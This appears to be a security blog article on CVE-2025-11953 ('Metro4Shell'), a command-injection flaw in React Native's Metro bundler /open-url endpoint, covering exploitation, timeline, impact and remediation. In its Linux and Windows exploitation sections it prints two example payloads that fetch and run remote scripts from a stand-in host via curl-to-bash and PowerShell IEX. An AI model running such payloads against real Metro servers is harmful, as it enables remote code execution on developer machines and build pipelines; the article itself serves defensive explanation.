Metro4Shell: How CVE-2025-11953 Exposed the React Native Supply Chain

Metro4Shell: How CVE-2025-11953 Exposed the React Native Supply Chain

Alex Cipher's Profile Pictire Alex Cipher 8 min read

A single overlooked endpoint in a widely used development tool can become a hacker’s golden ticket. That’s exactly what happened with CVE-2025-11953, dubbed “Metro4Shell,” a critical vulnerability in the React Native Metro bundler’s /open-url endpoint. This flaw, present in versions 4.8.0 through 20.0.0-alpha.2 of the @react-native-community/cli-server-api package, allowed attackers to inject malicious URLs that the server would execute without question. The result? Developers and CI/CD pipelines worldwide found themselves exposed to cross-platform attacks, with hackers able to run arbitrary code on both Linux and Windows systems (BleepingComputer).

The vulnerability’s impact was immediate and widespread. Proof-of-concept exploits appeared within days of disclosure, and real-world attacks soon followed, targeting developer workstations and automated build environments. The incident highlights how even trusted tools can become vectors for sophisticated supply chain attacks, especially when security best practices like input validation are overlooked. As organizations scrambled to patch their systems, attackers leveraged the window of opportunity to deliver advanced payloads, exfiltrate sensitive data, and disrupt development operations (BleepingComputer).

How CVE-2025-11953 Opened the Door: The Technical Breakdown

Vulnerability Origin: The /open-url Endpoint and Unsanitized Input

CVE-2025-11953, also known as “Metro4Shell,” stems from a critical flaw in the React Native Metro bundler’s HTTP server, specifically within the /open-url endpoint. This endpoint was designed to facilitate development workflows by allowing URLs to be opened directly from HTTP requests. However, versions 4.8.0 through 20.0.0-alpha.2 of the @react-native-community/cli-server-api package failed to implement adequate input validation or sanitization for the URL parameter received in POST requests (BleepingComputer).

The vulnerability arises because the endpoint would pass user-supplied URLs directly to the JavaScript open() function without any checks. This unsanitized input created an opportunity for attackers to inject malicious URLs or payloads, which could be executed on the host system running the Metro server. The lack of input validation bypassed standard security controls, enabling arbitrary command execution in the context of the user running the Metro process.

Exploitation Mechanics: From Proof-of-Concept to Real-World Attacks

After JFrog researchers disclosed the vulnerability in early November 2025, multiple proof-of-concept (PoC) exploits surfaced in the public domain. These PoCs demonstrated how attackers could craft HTTP POST requests to the /open-url endpoint with malicious payloads embedded in the URL parameter. The Metro server, upon receiving such a request, would process the payload via the open() function, leading to the execution of arbitrary code (BleepingComputer).

The exploitation process typically involved the following steps:

  1. Target Identification: Attackers scanned for exposed Metro servers, which are often accessible on local networks or, in misconfigured environments, over the internet.
  2. Malicious Request Construction: A POST request was crafted with a specially constructed URL parameter designed to trigger code execution.
  3. Payload Delivery: The payload could be a reverse shell, a dropper for additional malware, or a script to exfiltrate sensitive data.
  4. Execution and Control: Once the payload was executed, attackers gained initial access to the developer’s system, often with the same privileges as the Metro process.

VulnCheck observed that exploitation campaigns began as early as December 21, 2025, and persisted into January 2026, with attackers delivering advanced cross-platform payloads targeting both Linux and Windows environments (BleepingComputer).

Cross-Platform Payload Delivery and Execution

One of the most significant aspects of CVE-2025-11953 is its ability to facilitate cross-platform exploitation. The Metro bundler is commonly used in both Linux and Windows development environments. The vulnerability’s exploitation did not depend on the underlying operating system, as the malicious payload was executed in the context of the Node.js process hosting the Metro server.

Linux Exploitation

On Linux systems, attackers could deliver shell scripts or ELF binaries as payloads. For example, a crafted URL parameter might invoke a command such as:

http://localhost:8081/open-url -d "bash -c 'curl http://malicious.site/payload.sh | bash'"

This would result in the Metro server executing the command, fetching and running the attacker’s script, which could then install backdoors, crypto miners, or other malware.

Windows Exploitation

On Windows, the attack vector was similar, but payloads were tailored to the Windows environment. Attackers could deliver PowerShell commands or executable files:

http://localhost:8081/open-url -d "powershell -Command \"IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1')\""

This enabled attackers to bypass traditional endpoint security controls, as the payload was executed by a trusted development tool, often whitelisted in enterprise environments.

Attack Surface Expansion: Developer Workstations and CI/CD Pipelines

The Metro server is frequently run on developer workstations and within continuous integration/continuous deployment (CI/CD) pipelines. The vulnerability thus expanded the attack surface beyond traditional production servers to include the software supply chain’s development and build stages.

Developer Workstations

Developers often run Metro servers locally, sometimes exposing them to wider networks for collaboration or testing purposes. Attackers leveraged this by scanning for open ports (default: 8081) and targeting machines with vulnerable Metro versions. Once compromised, attackers could access source code, credentials, and other sensitive assets stored on the developer’s machine.

CI/CD Environments

In CI/CD pipelines, Metro servers are sometimes launched automatically as part of build or test processes. These environments often have elevated privileges and access to critical infrastructure. Exploiting CVE-2025-11953 in such contexts allowed attackers to pivot deeper into organizational networks, manipulate build artifacts, or inject malicious code into software releases.

Timeline and Evolution of Exploitation Campaigns

The exploitation timeline of CVE-2025-11953 highlights the rapid weaponization of newly disclosed vulnerabilities in the software supply chain ecosystem.

  • Early November 2025: JFrog publicly discloses the vulnerability and releases a patched version (20.0.0) of the affected package.
  • Mid-November 2025: Multiple proof-of-concept exploits appear on public code repositories and security forums.
  • December 21, 2025: VulnCheck observes the first in-the-wild exploitation campaign, with attackers delivering cross-platform payloads.
  • January 4 and 21, 2026: Additional exploitation waves are detected, indicating sustained interest and adaptation by threat actors (BleepingComputer).

The rapid progression from disclosure to active exploitation underscores the importance of timely patching and vigilant monitoring of developer tooling.

Defensive Gaps and Security Control Bypass

The exploitation of CVE-2025-11953 was facilitated by several defensive gaps commonly found in development environments:

  • Lack of Network Segmentation: Developer machines and CI/CD servers often reside on flat networks, making them accessible to lateral movement once compromised.
  • Insufficient Endpoint Monitoring: Security solutions may deprioritize alerts from developer tools, allowing malicious activity to go undetected.
  • Default Configurations: Many Metro servers were deployed with default settings, including open network interfaces and lack of authentication.

Attackers exploited these gaps to establish persistent access, escalate privileges, and exfiltrate sensitive data. The use of trusted development tools as the attack vector further complicated detection and response efforts, as malicious activity blended in with legitimate development workflows.

Remediation and Patch Adoption Challenges

While the vulnerability was addressed in version 20.0.0 of the @react-native-community/cli-server-api package, patch adoption lagged in many organizations. Factors contributing to delayed remediation included:

  • Dependency Chains: Projects with complex dependency trees may have indirectly included vulnerable versions of the package, making identification and patching challenging.
  • Legacy Projects: Older codebases or projects with infrequent maintenance cycles were slower to update dependencies.
  • Lack of Awareness: Some development teams were unaware of the vulnerability’s severity or its applicability to their environments.

As a result, exploitation campaigns continued for weeks after the initial disclosure, with attackers targeting unpatched systems across a variety of organizations.

Attack Techniques: Payload Obfuscation and Evasion

Threat actors adapted their payloads to evade detection and maximize the effectiveness of their attacks. Techniques observed in the wild included:

  • Obfuscated Scripts: Payloads were encoded or obfuscated to bypass signature-based detection.
  • Living-off-the-Land Binaries (LOLBins): Attackers leveraged built-in system utilities (e.g., curl, wget, powershell) to download and execute additional malware.
  • Multi-Stage Payloads: Initial payloads acted as droppers, fetching more sophisticated malware or establishing command-and-control channels.

These techniques complicated incident response efforts and increased the dwell time of attackers within compromised environments.

Impact Assessment: Scope and Severity

The widespread use of React Native and the Metro bundler in modern application development amplified the impact of CVE-2025-11953. Key factors influencing the scope and severity included:

  • Prevalence: Metro is a core component of the React Native ecosystem, used by thousands of organizations worldwide.
  • Accessibility: The vulnerability was exploitable via a simple HTTP POST request, requiring minimal technical expertise.
  • Potential Damage: Attackers could gain initial access, escalate privileges, and compromise sensitive assets, including source code, credentials, and intellectual property.

VulnCheck and other security firms reported that exploitation campaigns targeted both individual developers and enterprise environments, with some attacks resulting in the theft of proprietary code and disruption of development operations (BleepingComputer).

Lessons Learned and Future Implications

The CVE-2025-11953 incident underscores the critical importance of securing development tooling and supply chain components. Key lessons include:

  • Input Validation: All user-supplied input, even in development tools, must be rigorously validated and sanitized.
  • Rapid Patch Deployment: Organizations must prioritize the timely application of security updates, especially for widely used dependencies.
  • Defense-in-Depth: Layered security controls, including network segmentation, endpoint monitoring, and least-privilege access, are essential to mitigate the risk of supply chain attacks.

The cross-platform nature and ease of exploitation of Metro4Shell serve as a stark reminder that development environments are high-value targets for threat actors and must be protected accordingly.


Note: All information in this report is based on the latest available data as of February 3, 2026, and references are provided via markdown hyperlinks to original sources where appropriate.

Final Thoughts

The Metro4Shell saga is a wake-up call for anyone involved in software development or supply chain security. It’s a vivid reminder that developer tools—often running with broad privileges and trusted by default—are prime targets for attackers. The rapid weaponization of CVE-2025-11953, coupled with the slow pace of patch adoption in some organizations, underscores the need for proactive security measures: rigorous input validation, rapid patching, and layered defenses like network segmentation and endpoint monitoring (BleepingComputer).

Looking ahead, as development environments become more complex and interconnected—with AI-driven automation, IoT integrations, and cloud-native workflows—the attack surface will only grow. The lessons from Metro4Shell should inform not just how we secure our current tools, but how we design and deploy the next generation of development infrastructure. Vigilance, education, and a culture of security-first thinking are essential to staying ahead of the next supply chain threat.

References